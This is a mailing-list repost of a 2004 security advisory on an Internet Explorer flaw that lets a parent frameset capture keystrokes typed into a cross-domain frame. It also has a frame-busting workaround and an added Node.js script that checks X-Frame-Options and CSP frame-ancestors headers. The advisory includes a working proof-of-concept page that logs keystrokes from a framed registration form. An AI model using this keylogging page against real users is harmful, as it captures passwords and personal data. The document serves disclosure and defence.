[NT] Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass
From: SecuriTeam (support_at_securiteam.com)
Date: 03/01/04
To: list@securiteam.com Date: 1 Mar 2004 18:54:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass
------------------------------------------------------------------------
SUMMARY
Internet Explorer (http://www.microsoft.com/ie/) is a set of core
technologies in Microsoft Windows operating systems that provide web
browsing functionality.
Exploitation of an access validation error within Internet Explorer allows
remote attackers to bypass the restrictions imposed on cross frame
scripting and observe keystrokes typed into a frame served from another
domain.
DETAILS
Vulnerable Systems:
* Internet Explorer versions 5 and 6 on Windows 2000
* Internet Explorer versions 5 and 6 on Windows XP
Immune Systems:
* Internet Explorer version 5 on Windows 98
The problem is a direct result of incomplete restrictions within the event
handling routines of Internet Explorer. According to Microsoft Knowledge
Base Article 167796
(http://support.microsoft.com/support/kb/articles/Q167/7/96.asp), script
access between frames located on different domains should be restricted.
Those restrictions can be bypassed by placing a malicious script in the
parent HTML document, outside the frameset it defines, and forcing the
frameset to keep focus: keypress events raised inside the cross-domain
frame are delivered to the parent document's handler.
The example below will display the captured keystrokes from the iDEFENSE
registration page in the status bar of the frameset:
<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
// The keystroke log lives in the parent document, outside the frameset.
var keylog = '';
// On vulnerable IE builds this handler also receives keypress events
// raised inside the cross-domain child frame below.
document.onkeypress = function () {
  var k = window.event.keyCode;
  window.status = keylog += String.fromCharCode(k) + '[' + k + ']';
};
</script>
</head>
<!-- onLoad/onBlur keep the frameset focused so typing keeps flowing to it -->
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset>
</html>
Keyboard events appear to be the only events that are leaked across
framesets. The malicious JavaScript can monitor all keystrokes typed
within the targeted frameset and could be used to transmit the keystrokes
to a remote location.
A victim would be alerted to this attack by noticing an incorrect URL in
the address bar or improper name on the SSL certificate. Therefore,
chances of success can be greatly increased when combining exploitation of
this vulnerability with the Internet Explorer URL Canonicalization
Vulnerability (MS04-004).
Workaround
Website administrators can prevent this attack on their own site by
ensuring that the site is never displayed inside another page's frameset.
The following snippet of JavaScript, placed in each page, breaks out of a
frame by navigating the top-level window to the page itself:
if (top != self)
{
    // The page is framed: replace the framing document with this page.
    top.location = self.location;
}
Script-based frame busting depends on the framed page's own script being
allowed to change top.location; current browsers also let a site refuse
framing server-side with the X-Frame-Options header or a
Content-Security-Policy frame-ancestors directive, which does not rely on
script in the page.
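The advisory's workaround has the framed page break itself out of a frameset. Browsers have since added a server-side way to state the same policy in response headers (X-Frame-Options and the Content-Security-Policy frame-ancestors directive), which the advisory does not cover. The following Node.js script is an added example, not code from the advisory or from iDEFENSE: given a response's headers, it decides whether a page at one origin may frame a page at another, applying the precedence current browsers use (frame-ancestors overrides X-Frame-Options; DENY and SAMEORIGIN are honoured; any other X-Frame-Options value is ignored; with no header at all anyone may frame the page, which was the situation in 2004). The sample header sets, the partner.example and attacker.example hostnames, and the simplified CSP source matching (exact scheme, host with a leading "*." wildcard, and port) are constructed for this example.

```javascript
// Added example (not part of the iDEFENSE/SecuriTeam advisory): can a page at
// framerUrl embed the response served at pageUrl in a <frame>/<iframe>?
// Assumptions of this example: header names and CSP keywords are compared
// case-insensitively; host-sources are matched by exact scheme, host (with an
// optional leading "*." wildcard) and port; the page's own origin is taken
// from pageUrl. The sample hostnames and header sets below are constructed.

function originOf(url) {
  const u = new URL(url);
  const scheme = u.protocol.slice(0, -1);
  const port = u.port || (scheme === 'https' ? '443' : scheme === 'http' ? '80' : '');
  return { scheme, host: u.hostname.toLowerCase(), port };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Does one frame-ancestors source expression match the framing origin?
function sourceMatches(src, page, framer) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return sameOrigin(page, framer);
  if (s === '*') return true;
  // scheme-source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.scheme === s.slice(0, -1);
  // host-source: [scheme://][*.]host[:port|:*]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\*|\d+))?$/.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme !== framer.scheme) return false;
  if (wildcard ? !framer.host.endsWith('.' + host) : framer.host !== host) return false;
  if (port === '*') return true;
  // No explicit port: the framer must be on the default port for its scheme.
  const expected = port || (framer.scheme === 'https' ? '443' : '80');
  return framer.port === expected;
}

function header(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name);
  return key === undefined ? undefined : headers[key];
}

function framingAllowed(headers, pageUrl, framerUrl) {
  const page = originOf(pageUrl);
  const framer = originOf(framerUrl);
  // CSP frame-ancestors, when present, takes precedence over X-Frame-Options.
  const csp = header(headers, 'content-security-policy');
  if (csp) {
    const directive = csp.split(';').map(d => d.trim())
      .find(d => /^frame-ancestors(\s|$)/i.test(d));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);
      return sources.some(src => sourceMatches(src, page, framer));
    }
  }
  const xfo = header(headers, 'x-frame-options');
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY') return false;
    if (v === 'SAMEORIGIN') return sameOrigin(page, framer);
    // Any other value (ALLOWALL, the obsolete ALLOW-FROM, typos) is ignored.
  }
  // Neither header: any site may frame the page, as in the advisory's scenario.
  return true;
}

// Constructed sample responses for the registration page named in the advisory.
const PAGE = 'https://www.idefense.com/register.jsp';
const SAMPLE_RESPONSES = {
  noHeaders: {},
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  xfoSameOrigin: { 'x-frame-options': 'sameorigin' },
  cspSelfAndPartner: {
    'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.partner.example",
  },
};

// Audit: for each sample response, which candidate framers may embed the page?
function audit(framers = ['https://www.idefense.com/', 'https://attacker.example/']) {
  const result = {};
  for (const [name, headers] of Object.entries(SAMPLE_RESPONSES)) {
    result[name] = Object.fromEntries(framers.map(f => [f, framingAllowed(headers, PAGE, f)]));
  }
  return result;
}

console.log(JSON.stringify(audit(), null, 2));
```

Run it with `node` to print the audit table; only the `cspSelfAndPartner` and `xfoSameOrigin` responses let the site's own origin frame the page while refusing attacker.example, and the header-less response (the advisory's case) lets anyone frame it.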
Vendor Status:
Microsoft has been contacted and has confirmed this is a bug. However,
Microsoft's position is that it does not constitute a full security
vulnerability.
Disclosure Timeline
February 4, 2004 - Vulnerability acquired by iDEFENSE
February 10, 2004 - Initial vendor notification
February 10, 2004 - Initial vendor response
February 11, 2004 - iDEFENSE clients notified
February 27, 2004 - Public disclosure
ADDITIONAL INFORMATION
The information has been provided by iDEFENSE Security Advisory
(idlabs-advisories@idefense.com).
The original article can be found at:
http://www.idefense.com/application/poi/display?id=77&type=vulnerability
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.